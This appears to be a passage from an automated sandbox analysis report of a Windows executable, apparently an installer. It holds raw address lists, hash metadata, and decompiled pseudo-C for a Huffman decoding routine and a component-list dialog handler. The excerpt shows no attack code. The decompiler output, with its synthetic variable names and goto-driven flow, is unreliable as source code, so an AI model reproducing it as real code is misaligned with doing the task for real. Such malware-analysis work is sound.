                                                            0x004070da
                                                            0x004070df
                                                            0x004070e5
                                                            0x004070eb
                                                            0x004070ed
                                                            0x004070f0
                                                            0x004070f9
                                                            0x004070ff
                                                            0x004070ff
                                                            0x004070f2
                                                            0x004070f4
                                                            0x004070f6
                                                            0x004070f6
                                                            0x00407101
                                                            0x00407107
                                                            0x00407109
                                                            0x0040710c
                                                            0x0040710e
                                                            0x00407114
                                                            0x00407116
                                                            0x00407118
                                                            0x0040711a
                                                            0x0040711c
                                                            0x0040711f
                                                            0x00407128
                                                            0x0040712b
                                                            0x0040712b
                                                            0x00407121
                                                            0x00407121
                                                            0x00407124
                                                            0x00407124
                                                            0x0040711f
                                                            0x00407116
                                                            0x0040712d
                                                            0x0040712f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040712f
                                                            0x004070ae
                                                            0x004070ae
                                                            0x004070b4
                                                            0x004070ba
                                                            0x004070bc
                                                            0x00000000
                                                            0x00000000
                                                            0x004070be
                                                            0x004070be
                                                            0x004070c0
                                                            0x004070c2
                                                            0x004070c9
                                                            0x004070c9
                                                            0x004070cb
                                                            0x004070c4
                                                            0x004070c4
                                                            0x004070c6
                                                            0x004070c6
                                                            0x004070cd
                                                            0x004070cf
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407147
                                                            0x00407147
                                                            0x0040714a
                                                            0x0040714c
                                                            0x0040714f
                                                            0x00407152
                                                            0x00407152
                                                            0x00407152
                                                            0x00407152
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406800
                                                            0x004067e4
                                                            0x00000000
                                                            0x004067ea
                                                            0x004067ed
                                                            0x004067f7
                                                            0x004067fa
                                                            0x004067fd
                                                            0x00000000
                                                            0x004067fd
                                                            0x004067e4
                                                            0x00406808
                                                            0x0040680b
                                                            0x0040680f
                                                            0x00406819
                                                            0x00406823
                                                            0x00406826
                                                            0x0040682c
                                                            0x00406960
                                                            0x00406962
                                                            0x00406968
                                                            0x0040696b
                                                            0x0040696e
                                                            0x00000000
                                                            0x0040696e
                                                            0x00406832
                                                            0x00406832
                                                            0x00406833
                                                            0x0040688b
                                                            0x0040688b
                                                            0x00406892
                                                            0x00406938
                                                            0x00406938
                                                            0x0040693d
                                                            0x00406940
                                                            0x00406945
                                                            0x00406948
                                                            0x0040694d
                                                            0x00406950
                                                            0x00406955
                                                            0x00406958
                                                            0x00406958
                                                            0x00000000
                                                            0x00406898
                                                            0x00406898
                                                            0x00406898
                                                            0x00406898
                                                            0x0040689c
                                                            0x0040689c
                                                            0x004068be
                                                            0x004068c1
                                                            0x004068c3
                                                            0x004068c6
                                                            0x004068cb
                                                            0x004068a1
                                                            0x004068a1
                                                            0x004068a6
                                                            0x004068a8
                                                            0x004068aa
                                                            0x004068af
                                                            0x004068b5
                                                            0x004068ba
                                                            0x004068bc
                                                            0x004068bc
                                                            0x004068b1
                                                            0x004068b1
                                                            0x004068b1
                                                            0x004068af
                                                            0x00000000
                                                            0x004068cd
                                                            0x004068fa
                                                            0x004068ff
                                                            0x00406901
                                                            0x00406902
                                                            0x00406904
                                                            0x00406905
                                                            0x00406905
                                                            0x00406905
                                                            0x0040692d
                                                            0x00406932
                                                            0x00406932
                                                            0x00000000
                                                            0x00406932
                                                            0x004068cb
                                                            0x00406892
                                                            0x00406835
                                                            0x00406835
                                                            0x00406836
                                                            0x00406880
                                                            0x00000000
                                                            0x00406880
                                                            0x00406838
                                                            0x00406839
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406995
                                                            0x00406995
                                                            0x00406995
                                                            0x00406998
                                                            0x00000000
                                                            0x00000000
                                                            0x00406975
                                                            0x00406975
                                                            0x00406979
                                                            0x00000000
                                                            0x00000000
                                                            0x0040697f
                                                            0x0040697f
                                                            0x00406982
                                                            0x00406985
                                                            0x0040698a
                                                            0x0040698c
                                                            0x0040698f
                                                            0x00406992
                                                            0x00406992
                                                            0x00406992
                                                            0x0040699a
                                                            0x0040699a
                                                            0x0040699d
                                                            0x0040699f
                                                            0x004069a4
                                                            0x004069a7
                                                            0x004069a9
                                                            0x004069ac
                                                            0x00000000
                                                            0x00000000
                                                            0x004069b2
                                                            0x004069b2
                                                            0x004069b4
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ba
                                                            0x004069ba
                                                            0x004069be
                                                            0x00000000
                                                            0x00000000
                                                            0x004069c4
                                                            0x004069c4
                                                            0x004069c7
                                                            0x004069c9
                                                            0x00406a67
                                                            0x00406a67
                                                            0x00406a6a
                                                            0x00406a6c
                                                            0x00406a6c
                                                            0x00406a6f
                                                            0x00406a72
                                                            0x00406a74
                                                            0x00406a76
                                                            0x00406a78
                                                            0x00406a78
                                                            0x00406a81
                                                            0x00406a86
                                                            0x00406a89
                                                            0x00406a8c
                                                            0x00406a8f
                                                            0x00406a92
                                                            0x00406a92
                                                            0x00406a92
                                                            0x00406a95
                                                            0x00406a9b
                                                            0x00406a9b
                                                            0x00406aa1
                                                            0x00406aa1
                                                            0x00406aa1
                                                            0x00000000
                                                            0x00406a95
                                                            0x004069cf
                                                            0x004069cf
                                                            0x004069d5
                                                            0x004069d8
                                                            0x004069da
                                                            0x00406a05
                                                            0x00406a08
                                                            0x00406a0e
                                                            0x00406a13
                                                            0x00406a19
                                                            0x00406a1f
                                                            0x00406a21
                                                            0x00406a24
                                                            0x00406a2d
                                                            0x00406a33
                                                            0x00406a33
                                                            0x00406a26
                                                            0x00406a28
                                                            0x00406a2a

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                            • Instruction ID: c3f2784b42629965e79a9deb6a6c5a882cbc70a40949ec996fd179ba06f8b65e
                                                            • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                            • Instruction Fuzzy Hash: EBE1BB71904719DFDB24CF58C880BAAB7F1FB45305F11852EE497A72C1E738AA91CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040727F(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                            				signed int _v8;
                                                            				unsigned int _v12;
                                                            				signed int _v16;
                                                            				intOrPtr _v20;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				intOrPtr* _v32;
                                                            				signed int* _v36;
                                                            				signed int _v40;
                                                            				signed int _v44;
                                                            				intOrPtr _v48;
                                                            				intOrPtr _v52;
                                                            				void _v116;
                                                            				signed int _v176;
                                                            				signed int _v180;
                                                            				signed int _v240;
                                                            				signed int _t166;
                                                            				signed int _t168;
                                                            				intOrPtr _t175;
                                                            				signed int _t181;
                                                            				void* _t182;
                                                            				intOrPtr _t183;
                                                            				signed int* _t184;
                                                            				signed int _t186;
                                                            				signed int _t187;
                                                            				signed int* _t189;
                                                            				signed int _t190;
                                                            				intOrPtr* _t191;
                                                            				intOrPtr _t192;
                                                            				signed int _t193;
                                                            				signed int _t195;
                                                            				signed int _t200;
                                                            				signed int _t205;
                                                            				void* _t207;
                                                            				short _t208;
                                                            				signed char _t222;
                                                            				signed int _t224;
                                                            				signed int _t225;
                                                            				signed int* _t232;
                                                            				signed int _t233;
                                                            				signed int _t234;
                                                            				void* _t235;
                                                            				signed int _t236;
                                                            				signed int _t244;
                                                            				signed int _t246;
                                                            				signed int _t251;
                                                            				signed int _t254;
                                                            				signed int _t256;
                                                            				signed int _t259;
                                                            				signed int _t262;
                                                            				void* _t263;
                                                            				void* _t264;
                                                            				signed int _t267;
                                                            				intOrPtr _t269;
                                                            				intOrPtr _t271;
                                                            				signed int _t274;
                                                            				intOrPtr* _t275;
                                                            				unsigned int _t276;
                                                            				void* _t277;
                                                            				signed int _t278;
                                                            				intOrPtr* _t279;
                                                            				signed int _t281;
                                                            				intOrPtr _t282;
                                                            				intOrPtr _t283;
                                                            				signed int* _t284;
                                                            				signed int _t286;
                                                            				signed int _t287;
                                                            				signed int _t288;
                                                            				signed int _t296;
                                                            				signed int* _t297;
                                                            				intOrPtr _t298;
                                                            				void* _t299;
                                                            
                                                            				_t278 = _a8;
                                                            				_t187 = 0x10;
                                                            				memset( &_v116, 0, _t187 << 2);
                                                            				_t189 = _a4;
                                                            				_t233 = _t278;
                                                            				do {
                                                            					_t166 =  *_t189;
                                                            					_t189 =  &(_t189[1]);
                                                            					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                            					_t233 = _t233 - 1;
                                                            				} while (_t233 != 0);
                                                            				if(_v116 != _t278) {
                                                            					_t279 = _a28;
                                                            					_t267 =  *_t279;
                                                            					_t190 = 1;
                                                            					_a28 = _t267;
                                                            					_t234 = 0xf;
                                                            					while(1) {
                                                            						_t168 = 0;
                                                            						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                            							break;
                                                            						}
                                                            						_t190 = _t190 + 1;
                                                            						if(_t190 <= _t234) {
                                                            							continue;
                                                            						}
                                                            						break;
                                                            					}
                                                            					_v8 = _t190;
                                                            					if(_t267 < _t190) {
                                                            						_a28 = _t190;
                                                            					}
                                                            					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                            						_t234 = _t234 - 1;
                                                            						if(_t234 != 0) {
                                                            							continue;
                                                            						}
                                                            						break;
                                                            					}
                                                            					_v28 = _t234;
                                                            					if(_a28 > _t234) {
                                                            						_a28 = _t234;
                                                            					}
                                                            					 *_t279 = _a28;
                                                            					_t181 = 1 << _t190;
                                                            					while(_t190 < _t234) {
                                                            						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                            						if(_t182 < 0) {
                                                            							L64:
                                                            							return _t168 | 0xffffffff;
                                                            						}
                                                            						_t190 = _t190 + 1;
                                                            						_t181 = _t182 + _t182;
                                                            					}
                                                            					_t281 = _t234 << 2;
                                                            					_t191 = _t299 + _t281 - 0x70;
                                                            					_t269 =  *_t191;
                                                            					_t183 = _t181 - _t269;
                                                            					_v52 = _t183;
                                                            					if(_t183 < 0) {
                                                            						goto L64;
                                                            					}
                                                            					_v176 = _t168;
                                                            					 *_t191 = _t269 + _t183;
                                                            					_t192 = 0;
                                                            					_t235 = _t234 - 1;
                                                            					if(_t235 == 0) {
                                                            						L21:
                                                            						_t184 = _a4;
                                                            						_t271 = 0;
                                                            						do {
                                                            							_t193 =  *_t184;
                                                            							_t184 =  &(_t184[1]);
                                                            							if(_t193 != _t168) {
                                                            								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                            								_t236 =  *_t232;
                                                            								 *((intOrPtr*)(0x4496a8 + _t236 * 4)) = _t271;
                                                            								 *_t232 = _t236 + 1;
                                                            							}
                                                            							_t271 = _t271 + 1;
                                                            						} while (_t271 < _a8);
                                                            						_v16 = _v16 | 0xffffffff;
                                                            						_v40 = _v40 & 0x00000000;
                                                            						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                            						_t195 = _v8;
                                                            						_t186 =  ~_a28;
                                                            						_v12 = _t168;
                                                            						_v180 = _t168;
                                                            						_v36 = 0x4496a8;
                                                            						_v240 = _t168;
                                                            						if(_t195 > _v28) {
                                                            							L62:
                                                            							_t168 = 0;
                                                            							if(_v52 == 0 || _v28 == 1) {
                                                            								return _t168;
                                                            							} else {
                                                            								goto L64;
                                                            							}
                                                            						}
                                                            						_v44 = _t195 - 1;
                                                            						_v32 = _t299 + _t195 * 4 - 0x70;
                                                            						do {
                                                            							_t282 =  *_v32;
                                                            							if(_t282 == 0) {
                                                            								goto L61;
                                                            							}
                                                            							while(1) {
                                                            								_t283 = _t282 - 1;
                                                            								_t200 = _a28 + _t186;
                                                            								_v48 = _t283;
                                                            								_v24 = _t200;
                                                            								if(_v8 <= _t200) {
                                                            									goto L45;
                                                            								}
                                                            								L31:
                                                            								_v20 = _t283 + 1;
                                                            								do {
                                                            									_v16 = _v16 + 1;
                                                            									_t296 = _v28 - _v24;
                                                            									if(_t296 > _a28) {
                                                            										_t296 = _a28;
                                                            									}
                                                            									_t222 = _v8 - _v24;
                                                            									_t254 = 1 << _t222;
                                                            									if(1 <= _v20) {
                                                            										L40:
                                                            										_t256 =  *_a36;
                                                            										_t168 = 1 << _t222;
                                                            										_v40 = 1;
                                                            										_t274 = _t256 + 1;
                                                            										if(_t274 > 0x5a0) {
                                                            											goto L64;
                                                            										}
                                                            									} else {
                                                            										_t275 = _v32;
                                                            										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                            										if(_t222 >= _t296) {
                                                            											goto L40;
                                                            										}
                                                            										while(1) {
                                                            											_t222 = _t222 + 1;
                                                            											if(_t222 >= _t296) {
                                                            												goto L40;
                                                            											}
                                                            											_t275 = _t275 + 4;
                                                            											_t264 = _t263 + _t263;
                                                            											_t175 =  *_t275;
                                                            											if(_t264 <= _t175) {
                                                            												goto L40;
                                                            											}
                                                            											_t263 = _t264 - _t175;
                                                            										}
                                                            										goto L40;
                                                            									}
                                                            									_t168 = _a32 + _t256 * 4;
                                                            									_t297 = _t299 + _v16 * 4 - 0xec;
                                                            									 *_a36 = _t274;
                                                            									_t259 = _v16;
                                                            									 *_t297 = _t168;
                                                            									if(_t259 == 0) {
                                                            										 *_a24 = _t168;
                                                            									} else {
                                                            										_t276 = _v12;
                                                            										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                            										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                            										_a5 = _a28;
                                                            										_a4 = _t222;
                                                            										_t262 = _t276 >> _t186;
                                                            										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                            										 *(_t298 + _t262 * 4) = _a4;
                                                            									}
                                                            									_t224 = _v24;
                                                            									_t186 = _t224;
                                                            									_t225 = _t224 + _a28;
                                                            									_v24 = _t225;
                                                            								} while (_v8 > _t225);
                                                            								L45:
                                                            								_t284 = _v36;
                                                            								_a5 = _v8 - _t186;
                                                            								if(_t284 < 0x4496a8 + _a8 * 4) {
                                                            									_t205 =  *_t284;
                                                            									if(_t205 >= _a12) {
                                                            										_t207 = _t205 - _a12 + _t205 - _a12;
                                                            										_v36 =  &(_v36[1]);
                                                            										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                            										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                            									} else {
                                                            										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                            										_t208 =  *_t284;
                                                            										_v36 =  &(_t284[1]);
                                                            									}
                                                            									_a6 = _t208;
                                                            								} else {
                                                            									_a4 = 0xc0;
                                                            								}
                                                            								_t286 = 1 << _v8 - _t186;
                                                            								_t244 = _v12 >> _t186;
                                                            								while(_t244 < _v40) {
                                                            									 *(_t168 + _t244 * 4) = _a4;
                                                            									_t244 = _t244 + _t286;
                                                            								}
                                                            								_t287 = _v12;
                                                            								_t246 = 1 << _v44;
                                                            								while((_t287 & _t246) != 0) {
                                                            									_t287 = _t287 ^ _t246;
                                                            									_t246 = _t246 >> 1;
                                                            								}
                                                            								_t288 = _t287 ^ _t246;
                                                            								_v20 = 1;
                                                            								_v12 = _t288;
                                                            								_t251 = _v16;
                                                            								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                            									L60:
                                                            									if(_v48 != 0) {
                                                            										_t282 = _v48;
                                                            										_t283 = _t282 - 1;
                                                            										_t200 = _a28 + _t186;
                                                            										_v48 = _t283;
                                                            										_v24 = _t200;
                                                            										if(_v8 <= _t200) {
                                                            											goto L45;
                                                            										}
                                                            										goto L31;
                                                            									}
                                                            									break;
                                                            								} else {
                                                            									goto L58;
                                                            								}
                                                            								do {
                                                            									L58:
                                                            									_t186 = _t186 - _a28;
                                                            									_t251 = _t251 - 1;
                                                            								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                            								_v16 = _t251;
                                                            								goto L60;
                                                            							}
                                                            							L61:
                                                            							_v8 = _v8 + 1;
                                                            							_v32 = _v32 + 4;
                                                            							_v44 = _v44 + 1;
                                                            						} while (_v8 <= _v28);
                                                            						goto L62;
                                                            					}
                                                            					_t277 = 0;
                                                            					do {
                                                            						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                            						_t277 = _t277 + 4;
                                                            						_t235 = _t235 - 1;
                                                            						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                            					} while (_t235 != 0);
                                                            					goto L21;
                                                            				}
                                                            				 *_a24 =  *_a24 & 0x00000000;
                                                            				 *_a28 =  *_a28 & 0x00000000;
                                                            				return 0;
                                                            			}
                                                            0x004074c9
                                                            0x004074c9
                                                            0x0040751f
                                                            0x00407523
                                                            0x0040752f
                                                            0x0040752a
                                                            0x0040752d
                                                            0x0040752d
                                                            0x00407537
                                                            0x0040753c
                                                            0x00407544
                                                            0x00407540
                                                            0x00407542
                                                            0x00407542
                                                            0x0040754a
                                                            0x0040754c
                                                            0x00407553
                                                            0x0040755d
                                                            0x00407567
                                                            0x00407583
                                                            0x00407587
                                                            0x004073cc
                                                            0x004073d2
                                                            0x004073d3
                                                            0x004073d5
                                                            0x004073db
                                                            0x004073de
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004073de
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407569
                                                            0x00407569
                                                            0x00407569
                                                            0x0040756e
                                                            0x00407577
                                                            0x00407580
                                                            0x00000000
                                                            0x00407580
                                                            0x0040758d
                                                            0x0040758d
                                                            0x00407590
                                                            0x00407597
                                                            0x0040759a
                                                            0x00000000
                                                            0x004073bd
                                                            0x0040733d
                                                            0x0040733f
                                                            0x0040733f
                                                            0x00407343
                                                            0x00407346
                                                            0x00407347
                                                            0x00407347
                                                            0x00000000
                                                            0x0040733f
                                                            0x004072b3
                                                            0x004072b9
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7f0ca315d4942290e4845dc22ac506fa28f6714ce5458d8b639d44a854dd49c
                                                            • Instruction ID: 0ca4a47b5fc6764e995cd925f966ceec75b0dec410f7dca902c933a8aa8fc986
                                                            • Opcode Fuzzy Hash: c7f0ca315d4942290e4845dc22ac506fa28f6714ce5458d8b639d44a854dd49c
                                                            • Instruction Fuzzy Hash: 0FC13631E042199BCF18CF68D8905EEBBB2FF89314F25866AD85677380D734A942CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 96%
                                                            			E00404CD9(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                            				struct HWND__* _v8;
                                                            				struct HWND__* _v12;
                                                            				long _v16;
                                                            				signed int _v20;
                                                            				signed int _v24;
                                                            				intOrPtr _v28;
                                                            				signed char* _v32;
                                                            				int _v36;
                                                            				signed int _v44;
                                                            				int _v48;
                                                            				signed int* _v60;
                                                            				signed char* _v64;
                                                            				signed int _v68;
                                                            				long _v72;
                                                            				void* _v76;
                                                            				intOrPtr _v80;
                                                            				intOrPtr _v84;
                                                            				void* _v88;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t203;
                                                            				intOrPtr _t206;
                                                            				long _t212;
                                                            				signed int _t216;
                                                            				signed int _t227;
                                                            				void* _t230;
                                                            				void* _t231;
                                                            				int _t237;
                                                            				long _t242;
                                                            				long _t243;
                                                            				signed int _t244;
                                                            				signed int _t250;
                                                            				signed int _t252;
                                                            				signed char _t253;
                                                            				signed char _t259;
                                                            				void* _t264;
                                                            				void* _t266;
                                                            				signed char* _t284;
                                                            				signed char _t285;
                                                            				long _t290;
                                                            				signed int _t300;
                                                            				signed int _t308;
                                                            				signed char* _t316;
                                                            				int _t320;
                                                            				int _t321;
                                                            				signed int* _t322;
                                                            				int _t323;
                                                            				long _t324;
                                                            				signed int _t325;
                                                            				long _t327;
                                                            				int _t328;
                                                            				signed int _t329;
                                                            				void* _t331;
                                                            
                                                            				_v12 = GetDlgItem(_a4, 0x3f9);
                                                            				_v8 = GetDlgItem(_a4, 0x408);
                                                            				_t331 = SendMessageA;
                                                            				_v24 =  *0x452448;
                                                            				_v28 =  *0x452430 + 0x94;
                                                            				_t320 = 0x10;
                                                            				if(_a8 != 0x110) {
                                                            					L23:
                                                            					if(_a8 != 0x405) {
                                                            						_t298 = _a16;
                                                            					} else {
                                                            						_a12 = 0;
                                                            						_t298 = 1;
                                                            						_a8 = 0x40f;
                                                            						_a16 = 1;
                                                            					}
                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                            						_v16 = _t298;
                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                            							if(( *0x452439 & 0x00000002) != 0) {
                                                            								L41:
                                                            								if(_v16 != 0) {
                                                            									_t242 = _v16;
                                                            									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                            										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                            									}
                                                            									_t243 = _v16;
                                                            									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                            										_t298 = _v24;
                                                            										_t244 =  *(_t243 + 0x5c);
                                                            										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                            											 *(_t244 * 0x2018 + _t298 + 8) =  *(_t244 * 0x2018 + _t298 + 8) & 0xffffffdf;
                                                            										} else {
                                                            											 *(_t244 * 0x2018 + _t298 + 8) =  *(_t244 * 0x2018 + _t298 + 8) | 0x00000020;
                                                            										}
                                                            									}
                                                            								}
                                                            								goto L48;
                                                            							}
                                                            							if(_a8 == 0x413) {
                                                            								L33:
                                                            								_t298 = 0 | _a8 != 0x00000413;
                                                            								_t250 = E00404C27(_v8, _a8 != 0x413);
                                                            								_t325 = _t250;
                                                            								if(_t325 >= 0) {
                                                            									_t99 = _v24 + 8; // 0x8
                                                            									_t298 = _t250 * 0x2018 + _t99;
                                                            									_t252 =  *_t298;
                                                            									if((_t252 & 0x00000010) == 0) {
                                                            										if((_t252 & 0x00000040) == 0) {
                                                            											_t253 = _t252 ^ 0x00000001;
                                                            										} else {
                                                            											_t259 = _t252 ^ 0x00000080;
                                                            											if(_t259 >= 0) {
                                                            												_t253 = _t259 & 0x000000fe;
                                                            											} else {
                                                            												_t253 = _t259 | 0x00000001;
                                                            											}
                                                            										}
                                                            										 *_t298 = _t253;
                                                            										E0040117D(_t325);
                                                            										_a12 = _t325 + 1;
                                                            										_a16 =  !( *0x452438) >> 0x00000008 & 0x00000001;
                                                            										_a8 = 0x40f;
                                                            									}
                                                            								}
                                                            								goto L41;
                                                            							}
                                                            							_t298 = _a16;
                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                            								goto L41;
                                                            							}
                                                            							goto L33;
                                                            						} else {
                                                            							goto L48;
                                                            						}
                                                            					} else {
                                                            						L48:
                                                            						if(_a8 != 0x111) {
                                                            							L56:
                                                            							if(_a8 == 0x200) {
                                                            								SendMessageA(_v8, 0x200, 0, 0);
                                                            							}
                                                            							if(_a8 == 0x40b) {
                                                            								_t230 =  *0x43c074;
                                                            								if(_t230 != 0) {
                                                            									ImageList_Destroy(_t230);
                                                            								}
                                                            								_t231 =  *0x43c088;
                                                            								if(_t231 != 0) {
                                                            									GlobalFree(_t231);
                                                            								}
                                                            								 *0x43c074 = 0;
                                                            								 *0x43c088 = 0;
                                                            								 *0x452480 = 0;
                                                            							}
                                                            							if(_a8 != 0x40f) {
                                                            								L90:
                                                            								if(_a8 == 0x420 && ( *0x452439 & 0x00000001) != 0) {
                                                            									_t321 = (0 | _a16 == 0x00000020) << 3;
                                                            									ShowWindow(_v8, _t321);
                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
                                                            								}
                                                            								goto L93;
                                                            							} else {
                                                            								E004011EF(_t298, 0, 0);
                                                            								_t203 = _a12;
                                                            								if(_t203 != 0) {
                                                            									if(_t203 != 0xffffffff) {
                                                            										_t203 = _t203 - 1;
                                                            									}
                                                            									_push(_t203);
                                                            									_push(8);
                                                            									E00404CA7();
                                                            								}
                                                            								if(_a16 == 0) {
                                                            									L75:
                                                            									E004011EF(_t298, 0, 0);
                                                            									_v36 =  *0x43c088;
                                                            									_t206 =  *0x452448;
                                                            									_v64 = 0xf030;
                                                            									_v24 = 0;
                                                            									if( *0x45244c <= 0) {
                                                            										L86:
                                                            										if( *0x4524de == 0x400) {
                                                            											InvalidateRect(_v8, 0, 1);
                                                            										}
                                                            										if( *((intOrPtr*)( *0x44e3fc + 0x10)) != 0) {
                                                            											E00404BE2(0x3ff, 0xfffffffb, E00404BFA(5));
                                                            										}
                                                            										goto L90;
                                                            									}
                                                            									_t322 = _t206 + 8;
                                                            									do {
                                                            										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                            										if(_t212 != 0) {
                                                            											_t300 =  *_t322;
                                                            											_v72 = _t212;
                                                            											_v76 = 8;
                                                            											if((_t300 & 0x00000001) != 0) {
                                                            												_v76 = 9;
                                                            												_v60 =  &(_t322[4]);
                                                            												_t322[0] = _t322[0] & 0x000000fe;
                                                            											}
                                                            											if((_t300 & 0x00000040) == 0) {
                                                            												_t216 = (_t300 & 0x00000001) + 1;
                                                            												if((_t300 & 0x00000010) != 0) {
                                                            													_t216 = _t216 + 3;
                                                            												}
                                                            											} else {
                                                            												_t216 = 3;
                                                            											}
                                                            											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
                                                            											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                            											SendMessageA(_v8, 0x110d, 0,  &_v76);
                                                            										}
                                                            										_v24 = _v24 + 1;
                                                            										_t322 =  &(_t322[0x806]);
                                                            									} while (_v24 <  *0x45244c);
                                                            									goto L86;
                                                            								} else {
                                                            									_t323 = E004012E2( *0x43c088);
                                                            									E00401299(_t323);
                                                            									_t227 = 0;
                                                            									_t298 = 0;
                                                            									if(_t323 <= 0) {
                                                            										L74:
                                                            										SendMessageA(_v12, 0x14e, _t298, 0);
                                                            										_a16 = _t323;
                                                            										_a8 = 0x420;
                                                            										goto L75;
                                                            									} else {
                                                            										goto L71;
                                                            									}
                                                            									do {
                                                            										L71:
                                                            										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
                                                            											_t298 = _t298 + 1;
                                                            										}
                                                            										_t227 = _t227 + 1;
                                                            									} while (_t227 < _t323);
                                                            									goto L74;
                                                            								}
                                                            							}
                                                            						}
                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                            							goto L93;
                                                            						} else {
                                                            							_t237 = SendMessageA(_v12, 0x147, 0, 0);
                                                            							if(_t237 == 0xffffffff) {
                                                            								goto L93;
                                                            							}
                                                            							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
                                                            							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
                                                            								_t324 = 0x20;
                                                            							}
                                                            							E00401299(_t324);
                                                            							SendMessageA(_a4, 0x420, 0, _t324);
                                                            							_a12 = _a12 | 0xffffffff;
                                                            							_a16 = 0;
                                                            							_a8 = 0x40f;
                                                            							goto L56;
                                                            						}
